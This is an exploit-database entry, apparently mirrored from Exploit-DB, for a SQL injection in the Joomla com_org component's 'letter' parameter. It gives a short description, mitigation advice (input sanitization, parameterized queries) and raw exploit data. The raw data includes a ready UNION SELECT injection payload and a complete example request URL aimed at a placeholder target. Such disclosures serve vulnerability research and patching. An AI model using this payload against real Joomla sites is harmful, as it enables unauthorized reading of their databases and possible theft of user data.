header-logo
Suggest Exploit
vendor:
com_org
by:
kazuya
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_org
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla com_org SQL Injection Vulnerability (letter parameter)

This vulnerability allows an attacker to inject arbitrary SQL commands into the query by exploiting the 'letter' parameter in the 'com_org' component of Joomla. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable application. This can be done by appending the malicious SQL commands to the 'letter' parameter in the HTTP request.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated before being used in any SQL queries. Additionally, it is recommended to use parameterized queries instead of dynamic SQL queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Joomla com_org SQL Injection Vulnerability (letter parameter)
# Author: kazuya
# Mail: kazuy0r@gmail.com<mailto:kazuy0r@gmail.com> Jabber: kazuya@jabber.ccc.de<mailto:kazuya@jabber.ccc.de>
# Greetz to back2hack

# Vulnerability
# Query: SELECT count(*) FROM `jos_org` WHERE (`name` LIKE '<sql>%' || ...
# SQL: ')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f
# Example: http://[target].com/index.php?option=com_org&letter=')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f&task=indexs

Navigation

Suggest Exploit

Services By CQR